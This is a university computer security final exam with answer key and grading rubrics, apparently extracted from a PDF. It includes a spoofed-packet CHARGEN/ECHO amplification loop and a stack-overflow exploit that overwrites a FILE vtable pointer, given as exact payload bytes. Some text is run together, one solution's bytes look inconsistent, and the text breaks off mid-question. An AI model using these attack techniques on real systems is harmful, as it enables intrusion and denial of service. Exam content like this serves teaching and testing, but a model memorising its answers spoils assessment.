Popa & 2019
Print your name:
CS 161 Computer Security
,
(last)
I am aware of the Berkeley Campus Code of Student Conduct and acknowledge that academic misconduct will be reported to the Center for Student Conduct and may further result in partial or complete loss of credit.
Sign your name:
Print your SID:
Name of the person Name of the person sitting to your left: sitting to your right:
You may consult three double-sided, handwritten sheet of paper of notes. You may not consult other notes or textbooks. Calculators, computers, and other electronic devices are not permitted.
Bubble every item completely. Avoid using checkmarks or Xs. If you want to unselect an option, erase it completely and clearly.
For questions with circular bubbles, you may select only one choice. Unselected option (completely unfilled)
Only one selected option (completely filled)
For questions with square checkboxes, you may select one or more choices. You can select
multiple squares (completely filled).
If you think a question is ambiguous, please come up to the front of the exam room to the TAs. If we agree that the question is ambiguous we will announce the clarification to everyone.
You have 170 minutes. There are 10 questions of varying credit (125 points total).
Do not turn this page until your instructor tells you to do so.
Final Exam
(first)
Page 1 of 28
Problem 1 Potpourri is unhealthy (20 points) (a) (2 points) True or False: Modern web browsers protect against clickjacking by using the
same-origin policy to prevent sites from putting other origins into an iframe. True False
(b) (2 points) True or False: The primary danger of XSS vulnerabilities is that they let an attacker execute Javascript on the victim machine without having the victim visit the attacker’s website.
True False
(c) (2 points) True or False: Even if you carefully inspect all links that you click, you can still be vulnerable to a CSRF attack.
True False
(d) (2 points) True or False: For most common implementations of session cookies (as seen in lecture and on the project), a SQL injection can let an attacker steal the sessions of other users.
True False
(e) (2 points) True or False: If a script is loaded from another origin using a script tag, the same-origin policy prevents this script from reading the cookies on the current page.
Final Exam
Page 2 of 28
CS 161 – Spring 2019
Solution: Most session cookies are stored in the backend as a database table.
True
False
(f) (2points) Somearchitecturesprohibitexecutingunalignedmachinecodeinstructions.Thismakes it harder for an attacker to perform return oriented programming, which often chains together
“gadgets” found by jumping to the middle of instructions.
(g) (2points) Incertificatetransparency,afteracertificateauthoritysignsacertificate,theysubmitthe signed certificate to a certificate transparency log. They receive a(n) signed certificate timestamp in return. If the signed certificate is not in the log after a certain amount of time, certificate authorities can use this to prove malicious or incorrect behavior of the log.
(h) (2points) Theuseoftrustedbootsystemsandsignedcodehelpspreventrootkits,whichismalcode that often hides in the BIOS and operating system.
(i) (2 points) At the beginning of their life cycles, computer worms grow exponentially, but as time goes on it becomes harder to find new victims and the worm growth slows.
(j) (2 points) Tor is fundamentally vulnerable against timing attacks conducted by global adversaries because it is supposed to be low latency / efficient.
Final Exam Page 3 of 28 CS 161 – Spring 2019
Problem 2 Welcome to the Wonderful World of (14 points) People of earth, boys and girls, children of all ages, welcome to the wonderful world of block cipher, symmetric encryption, and hash functions!
(a) There are two symmetric encryption schemes, SymEncA and SymEncB. Both implement valid encryption / decryption on a message / ciphertext, but one of them may be insecure.
Bob wants to combine these two schemes to avoid the risk of using a failed encryption scheme. He proposes the following combinational construction.
Construction I: The ciphertext of the message 𝑀 consists of two parts: 1. The first part of the ciphertext 𝐶𝑝𝑎𝑟𝑡−1 = SymEncA.Encrypt(𝑘; 𝑀).
2. The second part of the ciphertext 𝐶𝑝𝑎𝑟𝑡−2 = SymEncB.Encrypt(𝑘; 𝑀). 3. That is, the ciphertext is 𝐶 = (𝐶𝑝𝑎𝑟𝑡−1, 𝐶𝑝𝑎𝑟𝑡−2).
⋄ Question: Is the Construction I secure if at least one of the symmetric encryption schemes is secure? Why?
• If yes, fill the corresponding circle, and provide a concise description of why it can hide the message.
• If no, fill the corresponding circle, and provide a concise description of a counterexample. Please answer within 4 lines.
Yes. No. Please answer within the following four lines.
______________________________________________________________________
______________________________________________________________________
______________________________________________________________________
______________________________________________________________________
Solution: An insecure encryption scheme can simply leak the whole message. (3 points)
Final Exam Page 4 of 28 CS 161 – Spring 2019
(b) Bob proposes another combinational construction. Construction II: To encrypt message 𝑀, there are two steps:
1. The intermediate value 𝐼 = SymEncA.Encrypt(𝑘; 𝑀), which means it encrypts 𝑀 directly under key 𝑘. This intermediate value is not the ciphertext.
2. The final ciphertext 𝐶 = SymEncB.Encrypt(𝑘; 𝐼 ), which means it encrypts the intermediate value under key 𝑘.
3. That is, the ciphertext is 𝐶 = SymEncB.Encrypt(𝑘; SymEncA.Encrypt(𝑘; 𝑀))
⋄ Question: Is the Construction II secure if at least one of the symmetric encryption schemes is
secure? Why?
• If yes, fill the corresponding circle, and provide a concise description of why it can hide the message.
• If no, fill the corresponding circle, and provide a concise description of a counterexample.
Yes. No.
Please answer within 4 lines.
______________________________________________________________________
______________________________________________________________________
______________________________________________________________________
______________________________________________________________________
Solution: If the student said “insecure”, the student immediately obtains 2 point.
One example is if the encryption scheme simply leaks the entire key, for example SymEncB.Encrypt
(𝑘, 𝑀). In this case the composition is clearly insecure.
Another example is if both symmetric encryption schemes are based on CTR mode, but with a
small difference in using the counter. • The first encryption scheme:
𝐶0 =𝐼𝑉,
𝐶𝑖 =𝐴𝐸𝑆𝑘(𝐼𝑉+𝑖)⊕𝑀.
• The second encryption scheme:
𝐶0 =𝐼𝑉,
𝐶𝑖 =𝐴𝐸𝑆𝑘(𝐼𝑉+𝑖−1)⊕𝑀.
The position shift of the second one enables them to cancel each other. If the student excludes the nonce or initialization vector, it is also okay.
Final Exam Page 5 of 28 CS 161 – Spring 2019
(𝑘;𝑀) =
The student only needs provide a high level explanation that somehow indicates that one of the cipher can break the security by knowing the key used in another cipher. The total for this part is 4 points.
(c) You accidentally fell into a trap and entered the 8th floor of . On the wall the following sentences appear:
No block cipher provides IND-CPA confidentiality because they must be deterministic. No hash function provides IND-CPA confidentiality because they must be deterministic. No HMAC provides IND-CPA confidentiality because …
No digital signature provides IND-CPA confidentiality because ….
Some words on the last two lines are missing.
⋄ Question: What do you think the reasons should be? (Answer within the lines)
• No HMAC provides IND-CPA confidentiality because: ______________________________________________________________________
• No digital signature provides IND-CPA confidentiality because: ______________________________________________________________________ ______________________________________________________________________
(d) To make RSA signatures secure, we can apply a cryptographic hash function 𝐻 over the message 𝑀 , where the output of the hash function is a non-negative integer in {0, 1, …, 2256 − 1}. We know that this hash function 𝐻 must be second-preimage resistant; otherwise, another message 𝑀′ ≠ 𝑀 can be found that also matches the signature.
Later, the RSA signature is computed as follows:
𝑠𝑖𝑔 = 𝐻 (𝑀)𝑑 (mod 𝑛),
where 𝑛 is the RSA modulo, (𝑒, 𝑛) forms the RSA public key, (𝑑, 𝑛) forms the RSA private key, and
𝑒𝑑 ≡ 1 (mod 𝜙(𝑛)), where 𝜙(𝑛) is Euler’s totient function.
Alice wonders whether she can customize her hash function. She creates another function 𝐻′,
Solution: For hash-based MAC, deterministic, 1 points.
For digital signature, the verifier can use the verifying key to check a message, thus the signature cannot hide the message. Anything mentioning the verifying process can obtain 3 points here. If the student writes “deterministic” for digital signature, no point for the digital signature part.
modified from 𝐻 :
𝐻′(𝑥) = 𝐻(𝑥) − 𝐻(′′Alice′′) (mod 2256). Final Exam Page 6 of 28
CS 161 – Spring 2019
⋄ Question: Can we use 𝐻 ′ instead of 𝐻 for RSA signature for every possible message that Alice might sign?
Yes. No.
And explain within the line: ______________________________________________________________________
Solution: There exists a valid signature 0 for the string “Alice” for any key pair, 3 points.
Some students pointed out that 𝐻′(′′Alice′′) = 0. These solutions received partial credit, but a correct solution must explicitly mention that the signature is forgeable. Note that signatures do not aim to provide confidentiality, so statements like “the attacker will know the signature is on the string ‘Alice”’ are not relevant.
If the student mentions that the hash must be one-way, no point, since this function is still one-way. If the student mentions that this function is no longer collision-resistant, no point, since this function is still collision-resistant. This is regardless of whether the student mentions other possibilities.
If the student mentions that the hash function must be (modeled as) a random oracle, though this is not an explicit counterexample, still give the student 3 points.
Final Exam Page 7 of 28 CS 161 – Spring 2019
Problem 3 Low-level Denial of Service (8 points) In this question, you will help Mallory develop new ways to conduct denial-of-service (DoS) attacks.
(a) CHARGENandECHOareservicesprovidedbysomeUNIXservers.ForeveryUDPpacketarriving at port 19, CHARGEN sends back a packet with 0 to 512 random characters. For every UDP packet arriving at port 7, ECHO sends back a packet with the same content.
Mallory wants to perform a DoS attack on two servers. One with IP address 𝐴 supports CHARGEN, and another with IP address 𝐵 supports ECHO. Mallory can spoof IP addresses.
i. Is it possible to create a single UDP packet with no content which will cause both servers to consume a large amount of bandwidth?
• If yes, mark ‘Possible’ and fill in the fields below to create this packet. • If no, mark ‘Impossible’ and explain within the provided lines.
Possible
If possible, fill in the fields:
Impossible
Destination IP: A Destination port: 19
Source IP: B Source port:
7
If impossible, why? ______________________________________________________________________ ______________________________________________________________________
ii. Assume now that CHARGEN and ECHO are now modified to only respond to TCP packets (post-handshake) and not UDP. Is it possible to create a single TCP SYN packet with no content which will cause both servers to consume a large amount of bandwidth?
• If yes, mark ‘Possible’ and fill in the fields below to create this packet. • If no, mark ‘Impossible’ and explain within the provided lines.
Solution: Source IP: B, port: 7. Destination IP: A, port: 19. Source and destination can be flipped. Notice this will create a chain of CHARGEN and ECHO that will generate a lot of network traffic.
1 point for not checking ’impossible’, 2 points for correct answer (0.5/blank), for a total of 3 points.
Possible
If possible, fill in the fields:
Source IP: Source port: Sequence #:
Impossible
Destination IP: Destination port: Ack #: N/A
Final Exam
Page 8 of 28
CS 161 – Spring 2019
If impossible, why? ______________________________________________________________________ ______________________________________________________________________
Solution: Impossible. As seen in previous question, source/destination IP has to be B/A for the chain to work. If you send a SYN packet to A pretending to be B, A will send SYN-ACK to B, which won’t respond since it never sent a SYN. The connection won’t be established.
Answer as simple as “handshake won’t complete” would be given justification credit.
1 point for checking ’impossible’, 2 points for correct justification, for a total of 3 points. I expect students to want clarification for sequence number. No clarification should be given.
(b) A typical web server maintains a connection after receiving each TCP connection request. Write down the the name of the transport layer attack that can cause denial-of-service on the web server which works by consuming a large amount of server memory.
______________________________________________________________________
Solution: TCP SYN Flood (2 points)
Final Exam Page 9 of 28 CS 161 – Spring 2019
Problem 4 OTP-KE (9 points) Alice and Bob want to communicate securely. They come up with a new key exchange protocol, inspired by the Diffie-Hellman key exchange but based on the security properties of the one-time pad. Assume 𝐸𝐾(𝑀) is a one-time-pad with message 𝑀 and key 𝐾. The two of them randomly generate 𝐴 and 𝐵, which will be their own unique one-time pad keys. Alice also generates a truly random key 𝑆, which is the symmetric key she and Bob want to agree on and will be used for further communication after the key exchange.
To execute the protocol, Alice uses one-time-pad encryption to encrypt 𝑆 using her secret key 𝐴, then sends 𝐸𝐴(𝑆) to Bob. Bob encrypts the resulting message using his secret key and sends back 𝐸𝐵 (𝐸𝐴(𝑆)). Alice decrypts that message and sends back 𝐷𝐴 (𝐸𝐵 (𝐸𝐴(𝑆))).
Please answer each of the following questions in three sentences or less. Longer responses will not get credit.
(a) Explain how Alice and Bob can agree on 𝑆 based on this protocol.
(b) Is this protocol secure against a passive attacker?
Yes No
If yes, explain why. If no, provide an attack.
Solution: Alice has 𝑆 by construction.
Bob will be able to recover 𝑆 from the last message, because it is just 𝐸𝐵(𝑆) = 𝑆 ⊕ 𝐵, and he knows 𝐵.
Solution: No.
If the attacker observes all three messages in the exchange, they can XOR them all together to
get:𝑀1⊕𝑀2⊕𝑀3 =𝐸𝐴(𝑆)⊕𝐸𝐵(𝐸𝐴(𝑆))⊕𝐸𝐵(𝑆)=(𝑆⊕𝐴)⊕(𝑆⊕𝐴⊕𝐵)⊕(𝑆⊕𝐵) 𝐴, 𝐵, and one pair of 𝑆s cancel out, leaving the secret key 𝑆!
Note that the question requires a concrete attack. It is important for the students to at least mention one concrete attack that leaks 𝐴 or 𝐵.
(c) Is this protocol secure against an active attacker?
Yes No
No explanation needed.
Solution: An active attacker is strictly more powerful than a passive attacker.
Final Exam Page 10 of 28
CS 161 – Spring 2019
Problem 5 Private set intersection (13 points) Suppose Alice has a list of 𝑛 integers 𝑎1, 𝑎2, … , 𝑎𝑛; and Bob has a list of 𝑛 integers as well 𝑏1, 𝑏2, … , 𝑏𝑛. Each integer is only 16 bits long.
(a) Alice wants to know if they have any numbers in common, i.e., if there exist 𝑖, 𝑗 such that 𝑎𝑖 = 𝑏𝑗 . Bob applies a function 𝐹 to each of his numbers, and sends the list 𝐹(𝑏1),𝐹(𝑏2),…𝐹(𝑏𝑛) to Alice.
i. Which of the following choices of 𝐹 allows Alice to identify whether Bob has a 𝑏𝑗 that is equal to some element 𝑎𝑖 in Alice’s list? 𝑘 is a shared symmetric key.
𝐹(𝑥) = SHA-256(𝑥) 𝐹(𝑥) = AES-CBC𝑘(𝑥)
𝐹(𝑥) = SHA-256(𝑥||𝑟), where 𝑟 is 256 bits long and randomly chosen per 𝑥
𝐹(𝑥) = SHA-256(𝑥||𝑘) 𝐹(𝑥) = AES𝑘(𝑥) None of the above
Solution: SHA-256isdeterministic,andthereforeAlicecansimplyenumerateallpossible values it can take. This is however not possible when a random 256-bit 𝑟 is incorporated. Also, she can simply decrypt AES and AES-CBC since she knows the key.
ii. Which of the following choices of 𝐹 ensure that Alice can only identify the 𝑏𝑗 values that are equal to some element 𝑎𝑖 in Alice’s list? Alice should not be able to identify the value of 𝑏𝑗 if it is not equal to some value in her list.
𝐹(𝑥) = SHA-256(𝑥)
𝐹(𝑥) = SHA-256(𝑥||𝑟), where 𝑟 is 256 bits
long and randomly chosen per 𝑥 𝐹(𝑥) = AES𝑘(𝑥)
𝐹(𝑥) = AES-CBC𝑘(𝑥) 𝐹(𝑥) = SHA-256(𝑥||𝑘) None of the above
Solution: As in the previous part, SHA-256 is deterministic, and therefore vulnerable to a dictionary attack. This is not possible when a random 𝑟 is incorporated, but in this case, Alice can’t identify matching 𝑏𝑗 values either. Alice can simply decrypt AES and AES-CBC since she knows the key.
Final Exam
Page 11 of 28
CS 161 – Spring 2019
(b) NowsupposethatAliceandBobbothwishtolearnthecommonelementsintheirlists.Tothisend, they engage in a new protocol inspired by Diffie/Hellman. They agree on a large prime number 𝑝. Alice chooses a secret value 𝛼 uniformly at random from the set {1, 2, 3, … , 𝑝 − 2, 𝑝 − 1}. Bob follows the same procedure to choose a secret value 𝛽. They then exchange four messages sequentially, as follows. (𝐻 is a secure hash function.)
1. 2. 3. 4. i.
Alice → Bob: (𝐻(𝑎1))𝛼,(𝐻(𝑎2))𝛼,…,(𝐻(𝑎𝑛))𝛼 (all modulo 𝑝) Bob → Alice: (𝐻(𝑏1))𝛽,(𝐻(𝑏2))𝛽,…,(𝐻(𝑏𝑛))𝛽 (all modulo 𝑝) Alice → Bob: ???????????????????????????????????
Bob → Alice: ???????????????????????????????????
What values should Alice and Bob send to each other in steps 3 and 4? They should be able to identify values that exist in both their lists. They should not be able to identify any value in the other person’s list if is not equal to some value in their own list.
3. Alice → Bob: ____________________________________________________________ 4. Bob → Alice: ____________________________________________________________
Now suppose that Bob decides to cheat in step 4. Instead of sending the correct message to Alice, he wishes to make Alice believe that their lists are identical. Alice follows the protocol as before, and does not expect Bob to cheat.
⋄ Question: What values should Bob send to Alice in step 4 to achieve this? ________________________________________________________________________
Solution:
Alice → Bob: (𝐻(𝑏1))𝛽𝛼,(𝐻(𝑏2))𝛽𝛼,…,(𝐻(𝑏𝑛))𝛽𝛼 (all modulo 𝑝) Bob → Alice: (𝐻(𝑎1))𝛼𝛽,(𝐻(𝑎2))𝛼𝛽,…,(𝐻(𝑎𝑛))𝛼𝛽 (all modulo 𝑝)
Final Exam
Page 12 of 28 CS 161 – Spring 2019
ii.
Solution: (𝐻(𝑏1))𝛽𝛼,(𝐻(𝑏2))𝛽𝛼,…,(𝐻(𝑏𝑛))𝛽𝛼 (all modulo 𝑝) That is, Bob simply returns Alice’s message back to her.
Problem 6 Network Security (20 points) Answer the following questions about network security.
(a) Bob connects his laptop to the DeCafe coffee shop’s Wifi, which anyone nearby can join without a password. He browses to the website http://www.foocorp.com. At the table next to him is an evil attacker, Mallory, who has also joined the DeCafe Wifi network. What kind of threat model best describes Mallory when she first joins the network, with respect to Bob’s connection with DeCafe router’s?
Off-path attacker In-path attacker On-path attacker None of these
(b) Bob returns home and types into his browser www.foocorp.com. Suppose that Mallory has managed to poison the DNS cache on Bob’s laptop, such that it now thinks the IP address of www.foocorp.com is 6.6.6.6, which is the IP address of a server that Mallory controls.
Solution: Other users on a Wifi network with shared passwords are on-path attackers since Wifi packets are broadcast (through the air).
Mallory will be unable to steal Bob’s cookies for http://www.foocorp.com if http://www.foocorp.com uses HTTP- Only cookies.
Mallory will be unable to steal Bob’s cookies for http://www.foocorp.com if http://www.foocorp.com uses a CSP policy that only allows scripts to be loaded from sources on foocorp.com
Mallory will be unable to steal foocorp.com cookies marked with the secure flag.
Mallory will be unable to inject JavaScript into http://www.foocorp.com
Mallory will be unable to steal Bob’s foocorp.com cookies if foocorp.com uses HTTPS and Bob’s browser checks cer- tificate transparency logs over HTTPS.
Mallory will be unable to steal Bob’s cook- ies if foocorp.com uses HTTPS and Bob’s browser has previously received an HSTS header.
None of the above
Solution: DNSresultstellthemachinewhichIPaddressahostname/domainactuallyresides on. Thus, HTTP-only cookies do not protect Bob in this situation, since his browser will think that the server at 6.6.6.6 is actually foocorp.com (and thus send the cookies to Mallory’s malicious server). Similarly, CSP provides no protection because Bob’s machine will believe that 6.6.6.6 is foocorp.com and send the cookies by default.
Mallory won’t be able to steal foocorp.com’s cookies if they are marked as secure because they will ONLY ever be sent over HTTPS connections, which Mallory cannot establish since she does not have the private key that matches foocorp.com’s certificate.
Mallory will be able to inject conect into http://www.foocorp.com, since Bob’s browser will fetch the website’s code (HTML, JS, etc.) from Mallory’s malicious server. (Thus the answer that says she is unable to do so is false).
Final Exam
Page 13 of 28
CS 161 – Spring 2019
Mallory will be able to steal Bob’s cookies even if foocorp uses HTTPS since Bob’s browser does not necessarily know that foocorp uses HTTPS. When he browses to www.foocorp.com Mallory’s malicious server can just start an unprotected HTTP session and serve him malicious content / receive Bob’s cookies. Certificate transparency will be irrelevant in this case, so the answer that says Mallory is unable to steal the cookies due to cert transparency is incorrect.
On the other hand, an HSTS header tells the browser that a website must be visited over HTTPS. If Bob has previously received an HSTS header from foocorp.com, then his browser will know that it should only be connecting over HTTPS to foocorp.com; this will prevent Mallory for stealing Bob’s cookies or starting a valid session with his browser.
(c) Suppose that foocorp.com domain has the following four subdomains:
(www, alphabet, sushi, money).
The attacker knows that foocorp.com has only four subdomains but does not know any of their names, and wishes to discover the subdomains using the zone enumeration attack discussed in class.
⋄ Question: Assuming every DNS server uses plain NSEC, what is the minimum number of queries the attacker needs to make to foocorp.com’s nameservers in the worst-case for the attacker?
01234
5 6 to 10 11 to 24 25 to 35 ≥ 36
Solution: Supposethattheattackercorrectlyguesses‘alphabet’,‘money’,and‘www’correctly
on his first three tries. There are now 3 regions where the final domain might live: alphabet -> money, money -> www, and www -> alphabet. If the attacker searches the region from www -> alphabet (e.g., querying ‘zzzzzz’) and the region from alphabet -> money (e.g., querying ‘bbbbbb’), she will learn that no subdomains exist in those regions. But she’s now made 5 queries in total; when she searches the space between money -> www, the final subdomain sushi will be revealed, leading to a total of 6 queries. Since the attacker knows that there are
exactly 4 subdomains, she is done.
Final Exam
Page 14 of 28 CS 161 – Spring 2019
(d) Suppose that a user Alice is browsing the Internet at home and Mallory is an on-path attacker. In which of the following scenarios will Mallory be able to identify whether or not Alice is visiting a website on foocorp.com?
Alice’s machine and local DNS resolver ran- domize the source port of DNS queries; foocorp.com’s NS server use DNS (with- out DNSSEC); foocorp.com does not use HTTPS
Alice’s machine and local DNS resolver use a fixed source port for every DNS query; foocorp.com’s NS server uses DNSSEC with plain NSEC; foocorp.com does not use HTTPS
Alice’s machine and local DNS resolver use a fixed source port for every DNS query; foocorp.com’s NS server uses DNSSEC with NSEC3; foocorp.com does not use HTTPS
Alice’s machine and local DNS resolver use a fixed source port for every DNS query; foocorp.com’s NS server uses DNSSEC with NSEC3; foocorp.com uses HTTPS
None of the above
Solution: DNS does not provide confidentiality for a user’s queries, regardless of whether or not DNSSEC is used. Thus an on-path attacker can observe that Alice is visiting a foocorp.com website if Alice’s browser ever issues a DNS query for a subdomain on foocorp.com Moreover, HTTPS doesn’t hide the src and destination IP addresses of the connection. So even if Alice’s browser never issues a DNS query about foocorp.com’s sites, an on-path attacker can simply check whether the destination IP address of any of Alice’s sessions matches an IP address for foocorp.com. As a result, none of the solutions hide any destination site that Alice is visiting from Mallory.
(e) FooCorp has chosen to use very short TTLs in all of their DNS responses. Which of the following statements are true?
Short TTLs help protect against attacks where FooCorp’s DNS servers have been compromised
Assuming all DNS servers used DNSSEC with plain NSEC, then FooCorp’s decision to use short TTLs will increase the amount of work that the DNS servers of FooCorp’s parent zone need to perform
Short TTLs increase the number of requests FooCorp’s DNS servers need to support
Short TTLs help protect against DNS cache poisoning attacks by an on-path attacker
Short TTLs help protect against blind- spoofing attacks
None of the above
Solution: FooCorp’s decision to use short TTLs will actually hurt / cause attacks to be worse in the case of a compromise of their DNS servers, since the short TTLs will mean that users will be more likely to request new DNS records during the window of compromise. And during the window of compromise, the attacker has full control to set DNS responses to whatever they want (including the TTL values, regardless of what FooCorp’s original policy was).
Final Exam
Page 15 of 28
CS 161 – Spring 2019
Short TTLs do not provide any mitigation against spoofing attacks: if a spoofed DNS response succeeds, the attacker gets to set their own TTL; so the attacks involving on-path and blind- spoofing attacks are incorrect.
Short TTLs do not involve the parent zone in NSEC.
(f) FooCorp hosts all of its servers on machines provided by CheapCloud: a large, but unreliable, cloud hosting provider. CheapCloud suffers from two major problems: (i) they have frequent data breaches; and (ii) they often need to assign new IP addresses to their customers’ servers. Nevertheless, CheapCloud promptly notifies their customers whenever either of these events occurs.
⋄ Question: Which of the following designs or techniques can FooCorp use to help mitigate some of the security issues caused specifically by CheapCloud’s poor environment?
FooCorp uses plain DNS and sets short TTLs for all of its DNS responses
FooCorp uses RSA-based TLS with certifi- cate pinning
FooCorp uses DNSSEC with plain NSEC
FooCorp uses DHE-based TLS, but does not use certificate pinning
FooCorp uses DNSSEC with NSEC3 None of the above
Solution: Short TTLs will be useful here: because CheapCloud frequently issues new IP addresses to customer servers, that means that the DNS records for FooCorp will frequently be incorrect and point to the server of another customer. Short TTLs force resolvers to clear their cache entries more frequently, and thus issue new queries and receive the updated information more often.
Diffie-Hellman provides forward secrecy, which will help mitigate the frequent breaches that CheapCloud’s servers face: even if an attacker obtains a private key from a FooCorp server in one of these data breaches, forward secrecy protects the confidentiality of past TLS sessions.
Certificate pinning is not relevant to issues caused by CheapCloud’s environment, since the certificate authority issues are not related to CheapCloud’s environment. DNSSEC also isn’t relevant to CheapCloud’s environment since we’re not worried about spoofed DNS records; the bigger concern stems from the frequently changing IP addresses, which short TTLs addresses.
Final Exam
Page 16 of 28
CS 161 – Spring 2019
(g) Suppose foocorp.com, .com, and the root DNS servers all use DNSSEC. An attacker has com- promised the .com zone’s DNS servers and stolen just the .com Zone Signing Key (ZSK). Once .com manages to remove the attacker, which of the following steps should be taken to prevent an attacker from using the stolen ZSK to forge DNS responses after all existing signatures have expired?
foocorp.com will need to update its RRSIG records
foocorp.com will need to update its DNSKEY records
foocorp.com will need to update its DS records
foocorp.com will need to update its Key Signing Key
.com will need to update its DNSKEY records
.com will need to update its RRSIG records `.’ (the root zone) will need to update its
DNSKEY records
`.’ (the root zone) will need to update its
DS records for .com None of the above
Solution: This question tests two key concepts: How does a DNSSEC record recipient know that the records are actually valid? The answer is that there is the zone provides signatures over the records in the form of RRSIG records, which are signed by the zone’s ZSK (except for the DNSKEY record). If a zone’s ZSK is compromised, then the zone will need to create a new ZSK and generate a new batch of RRSIG records that uses this new ZSK.
In DNSSEC, what is the purpose of the Key-Signing Key? Exactly this situation: a ZSK for a zone is compromised and the ecosystem would like to efficiently remediate the situation. The KSK is only used to sign RRSIG for the DNSKEY record. The DNSKEY record tells the world what the zone’s ZSK is. If a zone’s ZSK is compromised and a new ZSK is created, this DNSKEY record will need to be updated to have the new ZSK entry. Since the KSK has not been compromised, it can still be used to generate the RRSIG for this DNSKEY record and none of the parent or child zones need to perform any changes.
Final Exam
Page 17 of 28
CS 161 – Spring 2019
Problem 7 Detection to Surveillance (7 points) The “No Such Agency” is looking to build a new surveillance system designed to detect “bad dudes”. They want to deploy this system at a single location on the network that they identified as a hub for international communication.
(a) Oneproposeddetectorhasafalsepositiverate(FPR)of𝑋,andafalsenegativerate(FNR)of𝑌,and the other proposed detector has a FPR of 𝑌 and a FNR of 𝑋 . Let 𝐶𝑃 be the cost of a false-positive, 𝐶𝑁 be the cost of a false negative, and 𝑝 be the fraction of malicious communications. Assume the detectors are otherwise identical.
⋄ Question: For what value of 𝑝 are the two systems equally preferred (as a function of 𝑋 , 𝑌 , 𝐶𝑃 and 𝐶𝑁 )?
𝑝=
Solution: Wewantthetotalcostsofthetwosystemstobeequal.Sincethetotalfalse-positives is FPR * Total negatives (and the analogous is true for total false-negatives):
𝑋(1 − 𝑝)𝐶𝑃 + 𝑌(𝑝)𝐶𝑁 = 𝑌(1 − 𝑝)𝐶𝑃 + 𝑋(𝑝)𝐶𝑁
𝑋𝐶𝑃 −𝑋𝑝𝐶𝑃 +𝑌𝑝𝐶𝑁 =𝑌𝐶𝑃 −𝑌𝑝𝐶𝑃 +𝑋𝑝𝐶𝑁 𝐶𝑃 (𝑋 − 𝑌 ) = 𝑝𝐶𝑁 (𝑋 − 𝑌 ) + 𝑝𝐶𝑃 (𝑋 − 𝑌 )
𝐶𝑃 =𝑝(𝐶𝑁 +𝐶𝑃) ⟹ 𝑝= 𝐶𝑃 𝐶𝑃 +𝐶𝑁
(b) Someone else suggests alerting at random: a random system will alert with probability 𝑟, and will not alert with probability (1 − 𝑟). Find the false-positive and the false-negative rates of this system.
FPR = FNR =
Solution: Remember, if 𝐴 is the event the detector alerts, and 𝑀 is the event that the commu- nication is malicious, the false-positive rate is
and the false-negative rate is
P(𝐴|¬𝑀 ) P(¬𝐴|𝑀 ).
Since both, in this case, are independent from the communication, this reduces to the probability that the detector alerts, or doesn’t alert, which is simply:
P(𝐴|¬𝑀) = P(𝐴) = 𝑟, P(¬𝐴|𝑀) = P(¬𝐴) = 1 − 𝑟.
Final Exam Page 18 of 28 CS 161 – Spring 2019
Problem 8 Virtual Tables, Real Fun (16 points) The following code runs on a 32-bit x86 system.
1 2 3 4 5 6 7 8
1 2 3 4 5 6 7 8 9
10
11
12
13
14
15
16
#include
int main() { FILE ∗fp;
char buf[8];
fp = fopen(“outis”, “rb”); fread(buf, sizeof char, 12, fp);
fclose ( fp ) ; }
Behind the hood, the FILE struct is implemented in stdio.h as follows:
struct _IO_FILE ; /∗ implementation omitted ∗/
typedef struct {
struct _IO_FILE ufile ; struct _IO_jump_t ∗ vtable ;
} FILE;
struct _IO_jump_t {
size_t (∗fread)(void ∗, size_t , size_t , FILE ∗); size_t (∗fwrite)(void ∗, size_t , size_t , FILE ∗); int (∗fclose)(FILE ∗);
/∗ more members below omitted ∗/
};
int fclose(FILE ∗fp) { return fp−>vtable−>fclose(fp); } /∗ more implementations below omitted ∗/
Make the following assumptions:
1. No memory safety defenses are enabled.
2. The compiler does not perform any optimizations, reorder any variables, nor add any padding in between struct members.
3. The implementation of the function fopen has been omitted. Assume a sensible implementation of fopen that initializes the ufile and vtable fields of the FILE struct to sensible values.
Final Exam Page 19 of 28 CS 161 – Spring 2019
(a) Running the program in gdb using invoke -d as in Project 1, you find the following: • &buf = 0xbf608040
• &fp = 0xbf608048
• sizeof(struct _IO_FILE) = 32
You wish to prove you can exploit the program by having it jump to the memory address 0xdeadbeef.
Complete the Python script below so that its output would successfully exploit the program. Note: The syntax \xRS indicates a byte with hex value 0xRS.
#!/usr/bin/env python2
import sys
sys.stdout.write(‘\x_____\x_____\x_____\x_____’ + \
‘\x_____\x_____\x_____\x_____’ + \
‘\x_____\x_____\x_____\x_____’)
Solution: There are two possible solutions: Solution 1:
3c 80 60 bf (= &buf – 4)
ef be ad de (= 0xdeadbeef)
20 80 60 bf (= &buf – 32)
Solution 2:
ef be ad de (= 0xdeadbeef)
38 80 60 07 (= &buf – 8)
24 80 60 07 (= &buf – 28)
Both solutions overwrite fp such that fp->vtable->fclose points to the memory address 0xdeadbeef. When fclose is called, this will lead to the shellcode at 0xdeadbeef being executed. Note that vtable is offset 32 from the start of the FILE struct, while fclose is at offset 8 from the start of the _IO_jump_t struct.
Award partial credit for each of the following.
• -1 point: not using little endian.
• 0 points: for solutions which write outside the lines, or which strongly misunderstand syntax. If this is the case, no further points can be awarded below.
• 1 point: writing 0xdeadbeef anywhere in the buffer. If 0xdeadbeef overwrites fp, no further points can be awarded below.
• One of the following (whichever gives more points):
– 4 points: overwriting fp with either 0xbf608020 or 0xbf608024.
– 2 points: overwriting fp with a value between 0xbf608000 and 0xbf608030.
Final Exam Page 20 of 28 CS 161 – Spring 2019
– 1 point: overwriting fp with a value between 0xbf608031 and 0xbf608040.
– If none of the above apply, award no points for this subpart. No further points
can be awarded below.
• One of the following (whichever gives more points):
– 3 points: emulate either solution by writing the correct value into the appropriate
spot: into &buf if using Solution 1, or &buf + 4 if using Solution 2.
– 1.5 points: emulate either solution by writing a value between 0xbf608030 and 0xbf608048 into the appropriate spot: into &buf if using Solution 1, or &buf + 4 if using Solution 2.
(b) Now you wish to write an exploit script, such that running it will successfully exploit the program. You save your code from part (a) as a script called egg. The vulnerable program is called hack_me. Which of the following code snippets is a valid exploit script?
#!/bin/bash
./egg | invoke hack_me
#!/bin/bash
outis=$(./egg)
invoke hack_me $outis
#!/bin/bash
invoke -e outis=$(./egg) hack_me
#!/bin/bash
./egg > outis
invoke hack_me
(c) Which of the following defenses would stop your attack in part (a) from exploiting the program by jumping to memory address 0xdeadbeef? Assume 0xdeadbeef is at a read-only part of memory.
Stack canaries
ASLR which does not randomize the .text segment (as in Project 1)
WˆX
ASLR which also randomizes the .text seg- ment
(d) (Consider this question independently from part (c).) Now consider that we move the variables fp and buf outside of the main function, as follows:
1 2 3 4
#include
